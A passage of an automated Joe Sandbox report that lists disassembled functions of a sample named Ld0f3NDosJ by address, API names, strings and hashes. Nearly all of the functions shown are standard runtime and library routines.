                          • Opcode Fuzzy Hash: 3c7442846abff8c8df307d68f8679435e50f571c47f0fd70ca014f12eac927a6
                          • Instruction Fuzzy Hash: E1413726B0EB4189EB11FBB4D4902FDA3E4BF44788F044435DE4DA6A96DF3AE516D340
                          Function 00007FF646E642D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 737ea793ec26d43c82dfac2ff29e7e99fb75e554c7b517a948dd59aa9a8f7307
                          • Instruction ID: 08ddea745b7c6e8040d730b9fc2f6373714f80c5933428c2bd5b0d1fc12e3d5c
                          • Opcode Fuzzy Hash: 737ea793ec26d43c82dfac2ff29e7e99fb75e554c7b517a948dd59aa9a8f7307
                          • Instruction Fuzzy Hash: CEF06D21B0C702C1FB24BB24E84937AA3A0BF8576AF945735C66EC61E9DF2ED049C600
                          Function 00007FF646E5D0F0 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 3175b5cd3c99ae02cc210337352930788fcf5b6860efe828d43d11b76a3d9a07
                          • Instruction ID: c7a355c5436ca30d1b623e1a944c3d5c63d0f2d5808154cc3a0df6fce01a6f94
                          • Opcode Fuzzy Hash: 3175b5cd3c99ae02cc210337352930788fcf5b6860efe828d43d11b76a3d9a07
                          • Instruction Fuzzy Hash: 94B1AE62A0EB4681FA65BF919584279E7D0FF44B84F098437DE4D87799DE3EE482C308
                          Function 00007FF646E53AF0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 333COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 4097890229-1689078516
                          • Opcode ID: 15998b583fd95bf7981427bc455597ab7499049441e43a247a1db67d2f6a571d
                          • Instruction ID: f72d2b41db491b6728c6013ed39a59327dbdc0ed6ab591df15c68045e65c9b9f
                          • Opcode Fuzzy Hash: 15998b583fd95bf7981427bc455597ab7499049441e43a247a1db67d2f6a571d
                          • Instruction Fuzzy Hash: 96E1B432A1CB9185EB10ABA8D4403FCB7F1FB44798F904236DA9D97A99EF39D485C700
                          Function 00007FF646E53650 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 4097890229-1689078516
                          • Opcode ID: 54bb480375be3ebf0a72b67a97a54435c89e9a34a2873debed63dd63b569f6ae
                          • Instruction ID: 08104ec7ba9abf710d050cb3787b688125a1394cdd9a94a46d376186aed80fd0
                          • Opcode Fuzzy Hash: 54bb480375be3ebf0a72b67a97a54435c89e9a34a2873debed63dd63b569f6ae
                          • Instruction Fuzzy Hash: 1AE1C272E1CB8189EB10ABA8D4403BDB7E0FB44758F904235EA9D97B99EF79D485C700
                          Function 00007FF646E541F0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 4097890229-1689078516
                          • Opcode ID: bd45317c97a8290d973bb3e51f545f26f5acee043a9526c901b580a979913f6b
                          • Instruction ID: bcdeb99e9fb4ef2aeba85dcc6ac18976f5caf3b6a629774595d50d1f92ff916c
                          • Opcode Fuzzy Hash: bd45317c97a8290d973bb3e51f545f26f5acee043a9526c901b580a979913f6b
                          • Instruction Fuzzy Hash: 0AE1D622A1C7A1C9EB10EBA8D4443FCB7E0FB45758F504236EA9D87A99DF79D485C700
                          Function 00007FF646E6C14C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                          • API String ID: 3215553584-1196891531
                          • Opcode ID: 66b2f51a0649884e4096f9c7989d83c361a7af35ddc5b3c377426008520acf5f
                          • Instruction ID: ade4673b68db568eba1dda5ef60044fe974bd23a443b4066f42250f63c0a23e9
                          • Opcode Fuzzy Hash: 66b2f51a0649884e4096f9c7989d83c361a7af35ddc5b3c377426008520acf5f
                          • Instruction Fuzzy Hash: BB819DB2E4C64289F765BF268118278B6E0BB15F88FD5A031DB0DD7685CE2FE8029601
                          Function 00007FF646E5E464 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 5a37976d64d3f605dbfc814b555d63d9fccece6550d88a2dbb9a871407429eb6
                          • Instruction ID: 297f70af227c22a9bd6c3ff46f2117e96541125597b708b2192a544b1c0a5e76
                          • Opcode Fuzzy Hash: 5a37976d64d3f605dbfc814b555d63d9fccece6550d88a2dbb9a871407429eb6
                          • Instruction Fuzzy Hash: 9091A073A0C7818AE750EFA5E4802ADBBE0FB44788F14412AEB8D97B55DF39D195CB00
                          Function 00007FF646E50EA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: false$true
                          • API String ID: 3668304517-2658103896
                          • Opcode ID: 9accd12e456d6621ec8394857af616d07afa0e2d4d747a09af928d0b79962d70
                          • Instruction ID: 918f95c7e7d008d8d5ff63f93432955a2e056e156a29b8dfbf4e93fa9a2a42c4
                          • Opcode Fuzzy Hash: 9accd12e456d6621ec8394857af616d07afa0e2d4d747a09af928d0b79962d70
                          • Instruction Fuzzy Hash: 9361A062B0DB8599FB00FBA9D0402ECA3F1BB447A8F504632DE5D677A9EE3AD555C300
                          Function 00007FF646E5CAB0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: 7b9ffd96eb02bcab443bbab1ea342f17490cf91d6da523a2e753e094f5bd8c31
                          • Instruction ID: 232df735a980c805da3c94f4e10db3b624524abdd11d57e325f3ef02d4fe6359
                          • Opcode Fuzzy Hash: 7b9ffd96eb02bcab443bbab1ea342f17490cf91d6da523a2e753e094f5bd8c31
                          • Instruction Fuzzy Hash: 34519F72A1D6028ADB54FB56E454A78B3E1FB44F98F114538DA4E87788EF7EE841C700
                          Function 00007FF646E5E1F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 232758f28d48bca0751b0218d3e2d5f792810a88b8735803dbe5591d708a7737
                          • Instruction ID: 372b7fcfe0a8f376c1a48a3abd1f5af459552b934459c4a95d140d61b7bf5b56
                          • Opcode Fuzzy Hash: 232758f28d48bca0751b0218d3e2d5f792810a88b8735803dbe5591d708a7737
                          • Instruction Fuzzy Hash: 1B619E7290CB8586DB20AF55E4413AAB7E0FB85B84F044235EB9D93B99CF7DE195CB00
                          Function 00007FF646E5E9E4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: a2a4ce20d499f562107bbf072005eea22e7a711c73ad7228162584aea294dff5
                          • Instruction ID: 704eebc0529e1a78feee2a6bdaef3fbb06190aab12bc9b4a7c0f4289706753f1
                          • Opcode Fuzzy Hash: a2a4ce20d499f562107bbf072005eea22e7a711c73ad7228162584aea294dff5
                          • Instruction Fuzzy Hash: 6E51803290C3828AEB74BFA19144268B7E0FB55B95F144135DA9D87BDACF3EE950CB01
                          Function 00007FF646E4C680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                          • String ID: bad locale name
                          • API String ID: 2775327233-1405518554
                          • Opcode ID: 10c9d6a64b0761eb994ff3f0882ec146ef825495342156a331405f159a6c9d2b
                          • Instruction ID: cb181ebc9ab63e3227f230838c7ad159b8907880f2080f650317885b5cc38089
                          • Opcode Fuzzy Hash: 10c9d6a64b0761eb994ff3f0882ec146ef825495342156a331405f159a6c9d2b
                          • Instruction Fuzzy Hash: 57414822B0EA418AEB14FFB1D4902FC62E4BF44B48F044535EA4DA7A9ADE3AD525D344
                          Function 00007FF646E67958 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 04c98705ab737532548b3a5d29c5fb6375a071cc17f856b1ee6e5a726e556bd2
                          • Instruction ID: a055169d4319c4b8219dd93f0b705d4ca23249aeeed96b57ca87465b67f9e7d5
                          • Opcode Fuzzy Hash: 04c98705ab737532548b3a5d29c5fb6375a071cc17f856b1ee6e5a726e556bd2
                          • Instruction Fuzzy Hash: 81D10132B0CA8189EB10EFB5D4402AC77B6FB05B98B845236DF4DA7B89DE39D146C740
                          Function 00007FF646E6833C Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF646E68327,?), ref: 00007FF646E6845A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 20ec9291bd5197c22fe20bfa2a151bfb9fdaba5cef85e4c25a9d644427f9bc83
                          • Instruction ID: 3cd9749a319e2ab73e7323c07e5d6027ac5a51e2eb8e31841b5d9651ad59497d
                          • Opcode Fuzzy Hash: 20ec9291bd5197c22fe20bfa2a151bfb9fdaba5cef85e4c25a9d644427f9bc83
                          • Instruction Fuzzy Hash: 1791D532A2C65285FB50FF6594542BEABE0BB44B88F842136DF0F97685DE3AE446C710
                          Function 00007FF646E588A8 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 203985260-0
                          • Opcode ID: 25339e7a552c1f5e1cf2dbfc7988e23db3c9975486644391a109ba6f3d96e73b
                          • Instruction ID: 7f3a42dfab52351002c071759e85ae23c4277421102e85720e2733f3a64d92e3
                          • Opcode Fuzzy Hash: 25339e7a552c1f5e1cf2dbfc7988e23db3c9975486644391a109ba6f3d96e73b
                          • Instruction Fuzzy Hash: 4C211876A1CB9586E320AF11A44432EB7B4FB89B94F244539DB8D93B55DF39D8068B00
                          Function 00007FF646E586FC Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • GetFileInformationByHandleEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF646E58E12,?,?,?,00007FF646E455A6), ref: 00007FF646E58728
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF646E58E12,?,?,?,00007FF646E455A6), ref: 00007FF646E58736
                          • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF646E58E12,?,?,?,00007FF646E455A6), ref: 00007FF646E5874E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FileHandleInformation$ErrorLast
                          • String ID:
                          • API String ID: 3070998852-0
                          • Opcode ID: 6990d8e371be0eb46f30ceadd86b13aea8d53be9ad5218298b234a77ccbc6518
                          • Instruction ID: 4324b4fb80819e2eb99109b62a6140056f532ed9107a22793f2e07cd3f13f68e
                          • Opcode Fuzzy Hash: 6990d8e371be0eb46f30ceadd86b13aea8d53be9ad5218298b234a77ccbc6518
                          • Instruction Fuzzy Hash: 1401213170CA4185EB60BB61E84016AB3E1BF48BC4F548835DA8DC7799DE3DD455C740
                          Function 00007FF646E587E8 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ErrorFileHandleInformationLast
                          • String ID:
                          • API String ID: 275135790-0
                          • Opcode ID: 189db887cbd54416728a2c52c8d663a7f58f90dcc3549c8f39d5c895ca1655f4
                          • Instruction ID: efc47bbbb4a8bbf0afc92e0e1b8be576cc838d51479a6b842c49fc815dec2acf
                          • Opcode Fuzzy Hash: 189db887cbd54416728a2c52c8d663a7f58f90dcc3549c8f39d5c895ca1655f4
                          • Instruction Fuzzy Hash: C4F0A431A0C15286FB687BA1E8546B6A7E0FF54705F440939C60EC25A5EF2EE9898742
                          Function 00007FF646E5869C Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CreateErrorLastLinkSymbolic
                          • String ID:
                          • API String ID: 191780330-0
                          • Opcode ID: 9dc62a7cf823184e85012eaed8589f325e11e2e6911a0eff8293541a438384c3
                          • Instruction ID: 27bad891780e7da37d8bc3de926a68c229b52f6dfdbc7ea72b48d150511029c4
                          • Opcode Fuzzy Hash: 9dc62a7cf823184e85012eaed8589f325e11e2e6911a0eff8293541a438384c3
                          • Instruction Fuzzy Hash: 54F03A10B2C6A2C2EFA07B52B44402BA3A0BF55BC5B045530D94D83A16CF6ED4868700
                          Function 00007FF646E5EC1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
